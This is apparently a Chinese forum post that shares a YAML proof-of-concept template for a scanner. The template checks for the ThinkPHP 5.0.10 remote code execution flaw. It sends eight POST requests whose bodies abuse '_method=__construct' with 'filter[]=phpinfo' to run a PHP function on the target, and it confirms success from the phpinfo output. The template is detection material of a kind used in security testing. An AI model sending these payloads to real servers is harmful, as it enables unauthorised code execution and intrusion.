thinkphp-5010-rce漏洞

黑客小王 · 2024-8-3 00:23

漏洞文件后缀名是.yaml
id: thinkphp-5010-rce

info:
  name: ThinkPHP 5.0.10 RCE
  author: zan8in
  severity: critical
  description: ThinkPHP <= 5.0.13
  reference:
- https://github.com/Lotus6/ThinkphpGUI/blob/main/ThinkphpGUI/src/main/java/exploit/

rules:
  r0:
request:
   method: POST
   path: /?s=index
   body: |
      s=-1&_method=__construct&method=post&filter[]=phpinfo
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r1:
request:
   method: POST
   path: /?s=manage
   body: |
      s=-1&_method=__construct&method=post&filter[]=phpinfo
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r2:
request:
   method: POST
   path: /?s=admin
   body: |
      s=-1&_method=__construct&method=post&filter[]=phpinfo
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r3:
request:
   method: POST
   path: /?s=api
   body: |
      s=-1&_method=__construct&method=post&filter[]=phpinfo
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r4:
request:
   method: POST
   path: /?s=index
   body: |
      _method=__construct&method=get&filter[]=phpinfo&get[]=-1
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r5:
request:
   method: POST
   path: /?s=manage
   body: |
      _method=__construct&method=get&filter[]=phpinfo&get[]=-1
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r6:
request:
   method: POST
   path: /?s=admin
   body: |
      _method=__construct&method=get&filter[]=phpinfo&get[]=-1
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
  r7:
request:
   method: POST
   path: /?s=api
   body: |
      _method=__construct&method=get&filter[]=phpinfo&get[]=-1
expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()|| r7()

thinkphp-5010-rce漏洞 Screenshot_2024-08-03-00-21-24-626_bin.mt.plus.jpg

帖子热度 1879 ℃